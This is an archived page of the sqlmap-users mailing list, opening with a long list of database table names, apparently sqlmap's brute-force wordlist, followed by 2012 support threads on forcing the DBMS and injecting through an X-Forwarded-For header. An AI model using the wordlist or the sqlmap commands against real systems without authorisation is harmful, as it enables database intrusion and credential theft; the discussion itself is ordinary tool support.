cmRepository cmRepositoryContentTypeDefinition cmRepositoryLanguage cmRole cmServiceBinding cmServiceDefinition cmServiceDefinitionAvailableServiceBinding cmSiteNode cmSiteNodeTypeDefinition cmSiteNodeVersion cmSystemUser cmSystemUserRole cmTransactionHistory cms_admin cms_admins cms_member cms_members cms_user cms_users cmsusers cmts cmts_track cocktail cocktail_lokal cocktail_person collection_item_count colnametests color colour columns_priv comboboxes combustible combustiblebois command commande commandes comments commissionEmployees community_item_count comp_group companies compte comptes computers computers_ID comune comuni concessionnaire concessionnaires conducts conf conferences config_seq configlist configuration configuratore connections connectorassocs connectorlinks connectormacassocs connectorswitches connexion contacts contador contador_empresa contenu control controle convite copyrights copytest correcaostrategy correo cost cotacao counter countries country_diseases country_partner coupon courses cpg132_users credential credenziali credit creditcards cron_send crops crops_tpl css_file currency curso cursos cust_order customers_basket customertax customurl cv_countries cv_country_synonyms cv_cropping_system cv_crops cv_pests_diseases cv_soil dados_estudante dados_familia dados_prefeitura dangnhap data data_set_association database databases datasets datasources dati db db_staff db_version dbaccount dbadmin dbadmins dblist dbpersoon dbstaff dbstudent dbstudents dbuser dbusers dcerpcbinds dcerpcrequests dealer dealers declaracaonf decodifica_campi decodifica_tabelle deducao defaultinsertid defaults defertest delete_reasons delivery delivery_quality departement depositor dept_location derived_types despesa_aluno despesa_familia detail_table devel_logsql developers developers_projects dg_books diary dictionary diplomatie directeur disciplina discipline discipline_utenti dist_universidade distance div_aa_annotation div_accession_collecting div_allele div_allele_assay div_annotation_type div_experiment div_generation div_locality div_obs_unit div_obs_unit_sample div_passport div_poly_type div_scoring_tech_type div_statistic_type div_stock div_stock_parent div_synonym div_taxonomy div_trait div_trait_uom div_treatment div_treatment_uom div_unit_of_measure document documento documentos dokumente domain_info download dpt_trans dtb_baseinfo dtb_bat_order_daily dtb_bat_order_daily_age dtb_bat_order_daily_hour dtb_bat_relate_products dtb_best_products dtb_bloc dtb_blocposition dtb_campaign dtb_campaign_detail dtb_category dtb_category_count dtb_category_total_count dtb_class dtb_classcategory dtb_csv dtb_csv_sql dtb_customer dtb_customer_mail_temp dtb_customer_reading dtb_deliv dtb_delivfee dtb_delivtime dtb_kiyaku dtb_mail_history dtb_mailmaga_template dtb_mailtemplate dtb_member dtb_news dtb_order dtb_order_detail dtb_order_temp dtb_other_deliv dtb_pagelayout dtb_payment dtb_products dtb_products_class dtb_question dtb_question_result dtb_recommend_products dtb_review dtb_send_customer dtb_send_history dtb_table_comment dtb_templates dtb_update dtb_user_regist dtproperties duptest duvida dw dwp_bewertung dwp_buchung_hotel dwp_content dwp_content_pic dwp_ecard_album dwp_ecard_pictures dwp_foto_album dwp_foto_pictures dwp_karte_kat dwp_karte_speisen dwp_kontakt dwp_link_entries dwp_link_kat dwp_news_absatz dwp_news_head dwp_news_kat dwp_popup dwp_structur dwp_wetter e107.e107_user e107_user eco_da_biz_ge edge edu egresado egresadoxidiomaxhabilidad emailinfo employer empresa empresa_atividade emprestimos emu_profiles emu_services encerramento encompasses endereco endpoints enregistrs enrolled enrollments enrolls entity entrants entreprise equipment_type equipment_type_seq esame especieaidf estado estado_civil estados estoque estudio_academico etablissement etudiants event_log eventi evento events evidence ew_gruppi ew_menu ew_moduli ew_tabelle ew_temi ew_user ewst_sessioni exam exchange exchangerate experiencia experiment experimental_data_set expression externallinks extremes ez_webstats_conf ezcontentobject_trash ezin_articles ezin_authors ezin_roles ezin_sections ezin_users ezsearch_return_count_new ezsearch_search_phrase_new f_attributedefinition f_attributedependencies f_classtype f_options f_sequence f_spatialcontext f_spatialcontextgroup facets facilities facturas facture faculty faixamulta fe_users federationApplicants feedback festplatte field field_options file file_storage filearchive files files_config films fiscal fk_test_has_fk fk_test_has_pk flow foreigntest foreigntest2 form_data form_data_archive form_definition form_definition_text form_definition_version form_definition_version_text form_error forum forum.ibf_members forum_cat forum_flag forum_post forum_report forum_topic forum_user forum_user_activity forum_user_stat forum_users forum_vote forums foto fournisseur fournisseurType fragment framework_email friend friend2 friend_statuses friends fruit func functions funny_jokes furniture fusion_user_groups fusion_users games ganatlebe_ge gd gearing general general_log genres genres_in_movies geo_Desert geo_Estuary geo_Island geo_Lake geo_Mountain geo_River geo_Sea geo_Source geraet gestionnaire gestor gesuche gifi gl glas glmm globals gly grandchild_test grants graphs graphs_items grau_escolaridade grau_parentesco greylist groupe groupes groups grp grupo grupoatividade gruppi guanggaotp guanli guanliyuan guava_group_assignments guava_groups guava_packages guava_preferences guava_role_assignments guava_roles guava_roleviews guava_sysmodules guava_theme_modules guava_themes guava_users guava_views guestbook guiaavulsa guiaavulsa_itemguiaavulsa gws_admin gws_banner gws_category gws_client gws_jobs gws_news gws_page gws_product gws_purchase gws_text h_admin habilidad hardware hash hashes hauptsächlich help_category help_keyword help_relation help_topic hero hersteller herunterladen hibernate_unique_key hilfe history_str hitcounter hoeren honorsinfo host hostbenchmarks hosts hot_prop hourlyEmployees house_extensions hsa_user humanitaruli_ge ibf_admin_sessions ibf_conf_settings ibf_members ibf_members_converge ibf_sessions icq id identification identities idioma idiomaxegresado ike_configs image imageAttribute imageCategoryList imageInfo imagelinks imagem imagens images index indexation indice individual info ingredients inscription insertids instituicao insurance intGroups intUseringroup intUsers interactions internetaddress interwiki intranet_users inv_lines_seq investigator invite invoice invoices invoices_seq ipassocs ipb.ibf_members ipb_sessions ipblocks iplinks ipmacassocs ippaths ips isDeleted_table isMember islandIn item_master_seq itemguiaavulsa itemnotafiscal items items_template itens iuridiuli_ge jforum_attach jforum_categories jforum_config jforum_extension_groups jforum_extensions jforum_forums jforum_groups jforum_posts jforum_privmsgs jforum_quota_limit jforum_ranks jforum_roles jforum_smilies jforum_topics jforum_users jforum_vote_desc jhu jiveExtComponentConf jiveGroup jiveGroupProp jiveGroupUser jiveID jiveOffline jivePrivacyList jivePrivate jiveProperty jiveRemoteServerConf jiveRoster jiveRosterGroups jiveSASLAuthorized jiveUser jiveUserProp jiveVCard jiveVersion job job_history job_title jobs joomla_users jos_banner jos_bannerclient jos_bannertrack jos_blastchatc_users jos_categories jos_components jos_comprofiler_members jos_contact_details jos_content jos_content_frontpage jos_content_rating jos_core_acl_aro jos_core_acl_aro_groups jos_core_acl_aro_map jos_core_acl_aro_sections jos_core_acl_groups_aro_map jos_core_log_items jos_core_log_searches jos_docman jos_docman_groups jos_docman_licenses jos_estadisticas jos_groups jos_jce_groups jos_jce_plugins jos_jf_content jos_jf_tableinfo jos_joomblog_users jos_languages jos_menu jos_menu_types jos_messages jos_messages_cfg jos_migration_backlinks jos_modules jos_modules_menu jos_moschat_users jos_newsfeeds jos_plugins jos_poll_data jos_poll_date jos_poll_menu jos_polls jos_preguntas jos_respuestas jos_sections jos_session jos_stats_agents jos_templates_menu jos_user jos_users jos_vm_auth_group jos_vm_auth_user_group jos_vm_auth_user_vendor jos_vm_cart jos_vm_category jos_vm_category_xref jos_vm_country jos_vm_coupons jos_vm_creditcard jos_vm_csv jos_vm_currency jos_vm_export jos_vm_function jos_vm_manufacturer jos_vm_manufacturer_category jos_vm_module jos_vm_order_history jos_vm_order_item jos_vm_order_payment jos_vm_order_status jos_vm_order_user_info jos_vm_orders jos_vm_payment_method jos_vm_product jos_vm_product_attribute jos_vm_product_attribute_sku jos_vm_product_category_xref jos_vm_product_discount jos_vm_product_download jos_vm_product_files jos_vm_product_mf_xref jos_vm_product_price jos_vm_product_product_type_xref jos_vm_product_relations jos_vm_product_reviews jos_vm_product_type jos_vm_product_type_parameter jos_vm_product_votes jos_vm_shipping_carrier jos_vm_shipping_label jos_vm_shipping_rate jos_vm_shopper_group jos_vm_shopper_vendor_xref jos_vm_state jos_vm_tax_rate jos_vm_user_info jos_vm_userfield jos_vm_userfield_values jos_vm_vendor jos_vm_vendor_category jos_vm_waiting_list jos_vm_zone_shipping jos_weblinks journal jubjub_errors jurosstrategy karbar karbaran kategorien kauf kauf_artikel kbase_category kbase_main key keyboards keys keywords klassen knews_lostpass knjiga korisnici kpro_adminlogs kpro_user kreditkarte kultura_ge kurs kwdikos langlinks language_text last lc_fields leases legacy_things lending les noms d'utilisateur librarian licenses lieferant liens ligneDeCommande ligneDeFacture line_items_seq lineas_fac lines links list liste_domaines lists live_ge livre loan locale located locatedOn locations locus_data log log_fake_referers logging login_admin login_admins login_name login_user login_users loginout logon logout logradouro logs logtest lokal lookup lost_pass lost_passwords lostpass lostpasswords m_admin m_data m_earnings m_news m_plans m_type m_users m_users_acct m_users_profile m_with mac macassocs maclinks macswitches madewith mail mailaddresses mailbox main makemodel mambo_session mambo_users manage manager manufacturer manutencao map_event mapdata marital_status markers massenmail master_table math maxcodcorreo maxcodcurso maxcodestudio maxcodevento maxcodexperiencia maxcodtelefono mb_users meals media medicalprocedure medien meetings mehrwertsteuer mein_doc mein_doc_h melodies memberid memberlist members members_networks membership membre membres membros_familia menu mergesWith message message_statuses messages metadata mgbliuyan mima minibbtable_users mixins mlattach mlgroup mlmail mm mobile_menu mobile_menu_text modir modiriat moduleexecs modulemailling modulemessage modulephoto modulerubriquephoto modules monitoringi_ge monthlabel moradia most_recent_checksum motd_coding moves movie movies mpassword mtb_pref mtb_zip mucAffiliation mucConversationLog mucMember mucRoom mucRoomProp multastrategy multastrategy_faixamulta municipio musername mushroom_NBC mushroom_NBC_class mushroom_dataset mushroom_test_results mushroom_test_results_agg mushroom_testset mushroom_trainset music_association music_ge music_items mwuser my_county my_lake my_poi my_street mybb_users mymps_advertisement mymps_badwords mymps_cache mymps_certification mymps_channel mymps_checkanswer mymps_config mymps_corp mymps_crons mymps_lifebox mymps_mail_sendlist mymps_mail_template mymps_member_album mymps_member_category mymps_member_comment mymps_member_docu mymps_member_docutype mymps_member_tpl mymps_navurl mymps_news mymps_news_focus mymps_news_img mymps_payapi mymps_payrecord mymps_telephone mymps_upload mysql mysql.user names nc ncat ndb_binlog_index net_pm networking networks neuf new news_category news_lostpass newsletter newsletter_queue newsletter_recipients nguoidung nguoidungs nlconfig nodes nom nom d'utilisateur noms not_null_test not_null_with_default_test not_sent_mails notafiscal notafiscal_deducao notafiscal_itemnotafiscal notes noticias notizen nuke_authors nuke_autonews nuke_banner nuke_banner_plans nuke_banner_positions nuke_banner_terms nuke_bbauth_access nuke_bbbanlist nuke_bbcategories nuke_bbconfig nuke_bbdisallow nuke_bbforum_prune nuke_bbforums nuke_bbgroups nuke_bbposts nuke_bbposts_text nuke_bbprivmsgs nuke_bbprivmsgs_text nuke_bbranks nuke_bbsearch_results nuke_bbsearch_wordlist nuke_bbsearch_wordmatch nuke_bbsessions nuke_bbsmilies nuke_bbthemes nuke_bbthemes_name nuke_bbtopics nuke_bbtopics_watch nuke_bbuser_group nuke_bbvote_desc nuke_bbvote_results nuke_bbvote_voters nuke_bbwords nuke_blocks nuke_cities nuke_comments nuke_config nuke_confirm nuke_counter nuke_downloads_categories nuke_downloads_downloads nuke_downloads_editorials nuke_downloads_modrequest nuke_downloads_newdownload nuke_downloads_votedata nuke_encyclopedia nuke_encyclopedia_text nuke_faqanswer nuke_faqcategories nuke_gallery_categories nuke_gallery_comments nuke_gallery_media_class nuke_gallery_media_types nuke_gallery_pictures nuke_gallery_pictures_newpicture nuke_gallery_rate_check nuke_gallery_template_types nuke_groups nuke_groups_points nuke_headlines nuke_journal nuke_journal_comments nuke_journal_stats nuke_links_categories nuke_links_editorials nuke_links_links nuke_links_modrequest nuke_links_newlink nuke_links_votedata nuke_main nuke_message nuke_modules nuke_pages nuke_pages_categories nuke_poll_check nuke_poll_data nuke_poll_desc nuke_pollcomments nuke_popsettings nuke_public_messages nuke_queue nuke_referer nuke_related nuke_reviews nuke_reviews_add nuke_reviews_comments nuke_reviews_main nuke_session nuke_stats_date nuke_stats_hour nuke_stats_month nuke_stats_year nuke_stories nuke_stories_cat nuke_subscriptions nuke_topics nuke_users nuke_users_temp nuked_page nulltest numedia obb_profiles object object_link object_types objectcache oc occasion odetails oe offers officer oidtest oil_banner oil_bannerclient oil_bannertrack oil_bfsurvey_pro oil_bfsurvey_pro_categories oil_bfsurvey_pro_example oil_bfsurveypro_34 oil_bfsurveypro_35 oil_bfsurveypro_choices oil_biolmed_blocks oil_biolmed_entity oil_biolmed_entity_types oil_biolmed_land oil_biolmed_measurements oil_biolmed_measures oil_biolmed_measures_by_entity_types oil_biolmed_technician oil_biolmed_thesis oil_categories oil_components oil_contact_details oil_content oil_content_frontpage oil_content_rating oil_core_acl_aro oil_core_acl_aro_groups oil_core_acl_aro_map oil_core_acl_aro_sections oil_core_acl_groups_aro_map oil_core_log_items oil_core_log_searches oil_dbcache oil_google oil_google_destinations oil_groups oil_jf_content oil_jf_tableinfo oil_languages oil_menu oil_menu_types oil_messages oil_messages_cfg oil_migration_backlinks oil_modules oil_modules_menu oil_newsfeeds oil_phocadownload oil_phocadownload_categories oil_phocadownload_licenses oil_phocadownload_sections oil_phocadownload_settings oil_phocadownload_user_stat oil_phocagallery oil_phocagallery_categories oil_phocagallery_comments oil_phocagallery_img_votes oil_phocagallery_img_votes_statistics oil_phocagallery_user_category oil_phocagallery_votes oil_phocagallery_votes_statistics oil_plugins oil_poll_data oil_poll_date oil_poll_menu oil_polls oil_rokdownloads oil_rokversions oil_sections oil_session oil_stats_agents oil_templates_menu oil_users oil_weblinks oldimage operation options order order_item order_line order_source orders_recalculate ordre ordreReparation organization_seq organization_type_package_map organizations orgs os osc_categories osc_categories_description osc_manufacturers osc_manufacturers_info osc_products osc_products_attributes osc_products_attributes_download osc_products_description osc_products_images osc_products_options osc_products_options_values osc_products_options_values_to_products_options osc_products_to_categories osc_reviews osc_specials ostypes osvendors outdoor_spaces p0fs package page page_log_exclusion page_restrictions pagecontent pagelinks pages papel papers paramtres parent_test parol partenaire partenaires participate partner partners partof partscustomer partsgroup partstax partsvendor pass pass_hash passe passes passw passwd passwds password passwords patient pay pay_melodies payer payload payment payment_qenta payments pc peer_config_child_config peer_configs pelates people people_reg perdorues perdoruesit perfil personnel personnes handicapes persons pessoa pessoa_endereco pessoa_telefone pg_ts_cfg pg_ts_cfgmap pg_ts_dict phonelist phones phorum_session phorum_user phorum_users photo photoo photos phpBB2.forum_users phpBB2.phpbb_users php_users phpads_clients phpads_config phpbb_acl_options phpbb_auth_access phpbb_banlist phpbb_categories phpbb_config phpbb_confirm phpbb_disallow phpbb_forum_prune phpbb_forums phpbb_groups phpbb_points_config phpbb_points_values phpbb_posts phpbb_posts_text phpbb_privmsgs phpbb_privmsgs_text phpbb_ranks phpbb_search_results phpbb_search_wordlist phpbb_search_wordmatch phpbb_sessions phpbb_smilies phpbb_themes phpbb_themes_name phpbb_topics phpbb_topics_watch phpbb_user_group phpbb_users phpbb_vote_desc phpbb_vote_results phpbb_vote_voters phpbb_words phpcms_announce phpmyadmin.pma_table_info phpshop_baners phpshop_categories phpshop_links phpshop_menu phpshop_news phpshop_opros phpshop_opros_categories phpshop_system phpshop_users physician pictures pierre liste placex platforms plugin plugin_sid plurielanim pma_bookmark pma_column_info pma_designer_coords pma_history pma_pdf_pages pma_relation pma_table_coords pma_table_info pma_tracking po_seq pokes poll poll_user pools portal_access portale post posts power powers preferences prereq presence pricegroup primarytest primarytest2 principal priorities problem proc procedure_biosample procedure_data_set processo procs_priv product_category product_colour_multi product_font product_font_multi product_price product_related product_size_multi product_type production_multiple production_wtype products_images produit produits produtos profession1 profile_pictures profiles profiling program project_user_xref projects projeto promocoes protocol protocol_action provincias pruefen psw pswd publicationauthor publicationfile publicusers publishers pueblos punbb_users pw pw_actions pw_adminset pw_announce pw_attachs pw_banuser pw_bbsinfo pw_config pw_credits pw_favors pw_forums pw_hack pw_membercredit pw_memberinfo pw_members pw_msg pw_polls pw_posts pw_schcache pw_sharelinks pw_smiles pw_styles pw_threads pw_tmsgs pw_usergroups pw_wordfb pwd pwd1 pwds pword pwrd quanly quantri queries querycache querycache_info querycachetwo questions queue_info radacct rating_track rcpt readers realtable rec_jobs recentchanges reciprocal_admin reciprocal_config reciprocal_links reciprocal_mails reciprocal_partnersites records redirect ref reg reg_user reg_users regioni register registeration registered registriert reglement reguser regusers rel_paper_topic rel_person_organization rel_person_paper rel_person_topic relation_members relations report reports request reservation reserve resource_types resources result resumo reviews revision riddles rights roads_endpoints rol role_permission roles rooms root roots roster routerbenchmarks routers routing rss rss_categories rss_category rss_item rss_read rss_subscription ruletest ruolo sailors sala salariedEmployees salesorder samedicino_ge sampleData sazog_urtiertoba_ge sazog_urtiertoba_ge2 sb_host_admin sb_host_adminActiveDataFeed sb_host_adminAffichage1 sb_host_adminAffichage1name sbreciprocal_cats schedule schema_info school sconfig searchindex section sections sector seen seentype seite_abschnitt seite_layout self_government_ge sendmsgs sent_mails seq_gen server servers service_request service_request_log services services_links sessions setting setup_ sf_guard_group sf_guard_group_permission sf_guard_permission sf_guard_remember_key sf_guard_user sf_guard_user_group sf_guard_user_permission sga_xplan_test shared_secret_identity shared_secrets shipment shipment_line shipping shipto shop.cards shop.orders shop_settings sic sidebar sing singin singup siteIndexTable site_climatic site_environment site_iwis site_location site_logins site_map_ge site_stats site_wtype sitelogins sites situacaoitem size sizes skins slow_log slserver smallnuke_members smf_members snipe_gallery_cat soc_da_polit_ge software software_licenses softwares solde solicitacao solicitacaosenha song sons soraldo_ele_tipo sort sounds source special_category specialty spip_articles spip_auteurs spip_auteurs_articles spip_auteurs_messages spip_auteurs_rubriques spip_breves spip_caches spip_documents spip_documents_articles spip_documents_breves spip_documents_rubriques spip_forum spip_groupes_mots spip_index spip_index_dico spip_messages spip_meta spip_mots spip_mots_articles spip_mots_breves spip_mots_documents spip_mots_forum spip_mots_rubriques spip_mots_syndic spip_ortho_cache spip_ortho_dico spip_petitions spip_referers spip_referers_articles spip_rubriques spip_signatures spip_syndic spip_syndic_articles spip_types_documents spip_versions spip_versions_fragments spip_visites spip_visites_articles sporti_ge spt_datatype_info spt_datatype_info_ext spt_provider_types sse_estudante sse_familia staff staff_db standort stars stars_in_movies state statename statistics statistiques stats statuses std_item stellen stkWeight stnuser stone list store store1 store2 store3 store4 stores stories ststaff studierende study study_text study_user stuser stuseres stusers subImageInfo subscriber subscribers super superuser synchro_element synchro_type sys sys_acl_actions sys_acl_matrix sys_options_cats sysadmin sysadmins sysconstraints sysmaps sysmaps_hosts sysmaps_links sysmergeschemaarticles syssegments system systime sysuser sysusers t1 t_peep t_snap t_stat table_user tables tables_priv tag taikhoan taikhoanquantri tameio tamio tamio_pelates task task_param tax taxon taxonomy tb_account tb_accounts tb_admin tb_administrator tb_admins tb_login tb_logins tb_member tb_members tb_nguoidung tb_nguoidungs tb_user tb_useraccount tb_useraccounts tb_username tb_usernames tb_users tbaccount tbaccounts tbadmin tbadmins tbl tblArtistCategory tblArtists tblConfigs tblLayouts tblLogBookAuthor tblLogBookEntry tblLogBookImages tblLogBookImport tblLogBookUser tblMails tblNewCategory tblNews tblOrders tblRestrictedPasswords tblRestrictedShows tblStoneCategory tblStones tblUser tblWishList tbl_account tbl_accounts tbl_admin tbl_admins tbl_categories tbl_client tbl_clients tbl_country tbl_event tbl_login tbl_logins tbl_member tbl_members tbl_nguoidung tbl_nguoidungs tbl_state tbl_tbadmin tbl_tech tbl_user tbl_useraccount tbl_useraccounts tbl_users tbl_works tbl_works_categories tbl_works_clients tbl_works_tech tblaccount tblaccounts tbladmin tbladmins tblblogcategories tblblogcomments tblblogentries tblblogentriescategories tblblogentriesrelated tblblogpages tblblogroles tblblogsearchstats tblblogsubscribers tblblogtextblocks tblblogtrackbacks tblclient tblclients tbllogin tbllogins tblmanager tblmanagers tblnguoidung tblnguoidungs tblogin tblogins tblproduct tblproducts tblservers tbluseraccount tbluseraccounts tbluserroles tbnguoidung tbnguoidungs tbuser tbuseraccount tbuseraccounts tbusers team telecharger telefone telefono telephone templatelinks terms test test_user test_users tester tests text tf_cookies tf_links tf_log tf_messages tf_rss tf_settings tf_users the theday themes tickers time_zone time_zone_leap_second time_zone_name time_zone_transition time_zone_transition_type timeperiod tipo_bolsa tipodeducao tissue tmp topic topicpublication topics track trackbacks trade traffic_selectors transaction transcache transfers translation transport trier trigger_depends triggers triggers_template trivia ts2_server_privileges tt_address tt_content turizmi_ge turns tuser tusers tutorial tx_tcdirectmail_bounceaccount tx_tcdirectmail_clicklinks tx_tcdirectmail_lock tx_tcdirectmail_sentlog tx_tcdirectmail_targets tx_templavoila_datastructure type typeFacture typeProduit typecompte u u_n u_name u_p u_pass uid un uname uniquetest uplebata_dacva_ge upload uploads url us usebb_members userAttribute userImageRating userInfo userSession user_admin user_connection user_defined_attribute user_groups user_id user_info user_list user_login user_logins user_name user_names user_newtalk user_nm user_online_newyear user_pass user_passw user_passwd user_password user_preferences user_pw user_pwd user_pword user_pwrd user_rights user_role user_test user_type_link user_types user_un user_uname user_uploads_pictures user_usern user_username user_usernm user_usrnm useraccount useraccounts usercontrol useres userfiles userid userlist userlistuser_list userlogins usern username usernames usernm userpass userpasswd userpassword userpwd userrights users_club users_sessions users_test users_tmp userstbl usertbl usr usr2 usr_n usr_name usr_pass usr_pw usrnam usrname usrnm usrpass usrs usuarios utente utenti utilisateur utilise utlisateur uvw_Category uvw_Pref uvw_Preferences valhalla variable_interest vars vb_user vbulletin_session vbulletin_user vcd vcd_Borrowers vcd_Comments vcd_CoverTypes vcd_Covers vcd_CoversAllowedOnMediatypes vcd_IMDB vcd_Images vcd_Log vcd_MediaTypes vcd_MetaData vcd_MetaDataTypes vcd_MovieCategories vcd_PornCategories vcd_PornStudios vcd_Pornstars vcd_PropertiesToUser vcd_RssFeeds vcd_Screenshots vcd_Sessions vcd_Settings vcd_SourceSites vcd_UserLoans vcd_UserProperties vcd_UserRoles vcd_UserWishList vcd_Users vcd_VcdToPornCategories vcd_VcdToPornStudios vcd_VcdToPornstars vcd_VcdToSources vcd_VcdToUsers vendedores vendor vendor_seq vendor_types vendors vendortax venues veranstalter verkaeufer versandkostenpreise version_data vertex vertreter verwalten verwaltet video videos viewLogBookEntry viewStoneArtist views_track viktorina_ge vip virgator_table vis_typen visits visual voodoo_members voraussetzen vote voting vrls_listing_images vrls_listings vrls_partners vrls_xref_country vrls_xref_listing_offer_type vrls_xref_listing_type vrls_xref_state_province vwListAllAvailable vykachka warehouse watchlist way_nodes ways webadmin webadmins webapps webcal_asst webcal_categories webcal_config webcal_entry_ext_user webcal_entry_log webcal_entry_repeats webcal_entry_repeats_not webcal_group webcal_group_user webcal_import webcal_import_data webcal_nonuser_cals webcal_report webcal_report_template webcal_site_extras webcal_user webcal_user_layers webcal_view webcal_view_user webmasters webusers wh_der_children wh_man_children win windows words work_orders wp1_categories wp1_comments wp_categories wp_comments wp_linkcategories wp_links wp_options wp_pod_fields wp_pod_pages wp_pod_types wp_pod_widgets wp_post2cat wp_postmeta wp_posts wp_term_relationships wp_term_taxonomy wp_terms wp_usermeta wp_users writer writes wsop x_admin x_world xar_roles xmldocument xoops_bannerclient xoops_users xristes yabb_settings yabbse_settings yearend yhm yhmm zahlung_weitere zipcodes zips zl_admin zl_advertisement zl_article zl_baoming zl_deeds zl_finance zl_media zo_gruppe_stelle zo_kontakt_stelle zones zoph_albums zoph_categories zoph_color_schemes zoph_people zoph_prefs zoph_users zuseserver zusti_da_sabuneb_ge zutat zutat_cocktail |
|
From: Miroslav S. <mir...@gm...> - 2012-06-20 14:00:37
|
Hi Iago. You can force it. You were right afterward probably asked by the sqlmap something like this: "you provided 'microsoft sql server' as back-end DBMS, but from a past scan information on the target URL sqlmap assumes the back-end DBMS is mysql. Do you really want to force the back-end DBMS value? [y/N]" To prevent confusion, that INFO message is now (with latest commit r5132) written only if you press "Y" in that message. Also, that YES is not a default setting because we expect users in those kind of situations to forget the wrong "--dbms=.." from old run. Kind regards, Miroslav Stampar On Wed, Jun 20, 2012 at 3:49 PM, Iago Sousa <146...@gm...> wrote: > Why when I put --dbms the sqlmap still resuming from session file? I > cannot force the sqlmap to use a dbms specificly? > > > Here the output: > [10:48:05] [INFO] resuming back-end DBMS 'mysql 5' from session file > > -- > Regards, > Iago Sousa > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Iago S. <146...@gm...> - 2012-06-20 13:50:07
|
Why when I put --dbms the sqlmap still resuming from session file? I cannot force the sqlmap to use a dbms specificly? Here the output: [10:48:05] [INFO] resuming back-end DBMS 'mysql 5' from session file -- Regards, Iago Sousa |
|
From: Anton S. <ant...@gm...> - 2012-06-18 17:12:39
|
Thanks, Miroslav, do appreciate this. Have a wonderful day. Anton. On Mon, Jun 18, 2012 at 8:14 PM, Miroslav Stampar <mir...@gm...> wrote: > Hi Anton. > > This is currently not supported. We'll inform you when it will. > > Kind regards, > Miroslav Stampar > > On Mon, Jun 18, 2012 at 5:25 PM, Anton Sazonov <hy...@ef...> wrote: >> >> Hello everyone, >> >> I have an application that is injectable using the 'x-forwarded-for' >> custom HTTP header. While I can specify it with --headers, I can't >> seem to find a way to use it as an injection point: >> >> C:\sqlmap>python sqlmap.py -u "http://www.example.com/index.php" >> --headers "x-for warded-for: 1" --level 5 --risk 3 --dbms mysql >> --threads 10 -p "x-forwarded-for" >> >> sqlmap/1.0-dev (r5112) - automatic SQL injection and database takeover >> tool >> http://www.sqlmap.org >> >> [10:50:04] [CRITICAL] all testable parameters you provided are not >> present within the GET, POST and Cookie parameters >> >> Is that expected behavior or am I missing something? >> >> Thank you, >> Anton >> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > Miroslav Stampar > http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-06-18 16:14:48
|
Hi Anton. This is currently not supported. We'll inform you when it will. Kind regards, Miroslav Stampar On Mon, Jun 18, 2012 at 5:25 PM, Anton Sazonov <hy...@ef...> wrote: > Hello everyone, > > I have an application that is injectable using the 'x-forwarded-for' > custom HTTP header. While I can specify it with --headers, I can't > seem to find a way to use it as an injection point: > > C:\sqlmap>python sqlmap.py -u "http://www.example.com/index.php" > --headers "x-for warded-for: 1" --level 5 --risk 3 --dbms mysql > --threads 10 -p "x-forwarded-for" > > sqlmap/1.0-dev (r5112) - automatic SQL injection and database takeover > tool > http://www.sqlmap.org > > [10:50:04] [CRITICAL] all testable parameters you provided are not > present within the GET, POST and Cookie parameters > > Is that expected behavior or am I missing something? > > Thank you, > Anton > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
48 messages has been excluded from this view by a project administrator.
